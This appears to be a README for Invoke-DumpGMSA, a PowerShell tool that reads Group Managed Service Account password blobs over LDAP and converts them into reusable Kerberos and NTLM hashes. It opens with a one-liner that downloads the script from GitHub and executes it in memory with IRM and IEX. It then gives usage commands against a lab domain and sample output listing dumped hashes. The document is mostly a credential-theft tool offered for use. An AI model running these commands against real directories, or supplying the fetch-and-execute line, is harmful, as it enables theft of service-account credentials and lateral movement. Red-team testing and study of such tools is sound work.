PowerShell port of core functionality from https://github.com/rvazarkar/GMSAPasswordReader.
Reads the password blob from a GMSA account using LDAP, and parses the values into hashes for re-use.
Load into memory
IRM 'https://raw.githubusercontent.com/The-Viper-One/Invoke-DumpGMSA/refs/heads/main/Invoke-DumpGMSA.ps1' | IEXCommands
# Search for all GMSA accounts and attempt to parse the password blob
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
# Target a specific account by DistinguishedName
Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL" -DN "CN=gmsaDragon,CN=Managed Service Accounts,DC=essos,DC=local"Example Output
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$
GMSA Account : ESSOS.LOCAL\gmsaDragon$
Password valid until : 10/09/2025 14:54:59
rc4_hmac : 85b952359bee0656b74f4259810f7cad
aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22
aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca
des_cbc_md5 : efa47ab31ae0d92f
Example Output (Lack of permissions)
PS > Invoke-DumpGMSA -Domain "ESSOS.LOCAL" -Server "MEEREEN.ESSOS.LOCAL"
Authenticated to MEEREEN.ESSOS.LOCAL as SEVENKINGDOMS\Moe
Found GMSA but no rights to read msDS-ManagedPassword as SEVENKINGDOMS\Moe